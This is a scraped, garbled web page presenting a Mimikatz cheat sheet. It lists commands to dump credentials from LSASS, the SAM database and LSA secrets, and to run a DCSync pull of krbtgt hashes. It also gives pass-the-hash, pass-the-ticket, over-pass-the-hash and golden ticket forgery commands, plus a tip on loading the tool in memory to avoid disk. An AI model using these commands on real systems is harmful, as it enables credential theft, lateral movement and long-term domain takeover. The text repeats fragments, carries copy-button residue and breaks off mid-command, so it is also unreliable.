Mimikatz Cheatsheet ^hot^ Jun 2026

Load Mimikatz directly into memory without touching disk.

: This command displays information about logged-on users and their associated security identifiers. sekurlsa::logonpasswords Use code with caution. mimikatz cheatsheet

lsass.exe process. bash sekurlsa::logonpasswords Use code with caution. Copied to clipboard Dump Local SAM Database: Retrieves NTLM hashes for local users. bash lsadump::sam Use code with caution. Copied to clipboard Dump LSA Secrets: Extracts cached credentials, service account passwords, and DPAPI keys. bash lsadump::secrets Use code with caution. Copied to clipboard 3. Lateral Movement Attacks Once you have hashes or tickets, use them to move across the network without knowing the plaintext password. GitHub +1 Pass-The-Hash (PtH): Starts a new process (e.g., cmd.exe) using a user's NTLM hash. bash sekurlsa::pth /user:Administrator /domain:DOMAIN.LOCAL /ntlm:HASH_HERE /run:cmd.exe Use code with caution. Copied to clipboard Pass-The-Ticket (PtT): Injects a Kerberos ticket ( .kirbi file) into your current session. bash kerberos::ptt "C:\path\to\ticket.kirbi" Use code with caution. Copied to clipboard Over-Pass-The-Hash: Upgrades an NTLM hash into a Kerberos ticket. bash sekurlsa::pth /user:TargetUser /domain:DOMAIN.LOCAL /ntlm:HASH_HERE /aes256:AES_KEY /run:powershell.exe Use code with caution. Copied to clipboard 4. Active Directory Persistence High-level attacks used to maintain long-term access to a domain. LinkedIn +1 DCSync Attack: Mimics a Domain Controller to pull password hashes for any user (requires specialized permissions). bash lsadump::dcsync /domain:DOMAIN.LOCAL /user:krbtgt Use code with caution. Copied to clipboard Golden Ticket Forgery: Creates a ticket-granting ticket (TGT) that grants Domain Admin access for up to 10 years. bash kerberos::golden /user:Administrator /domain:DOMAIN.LOCAL /sid:S- Load Mimikatz directly into memory without touching disk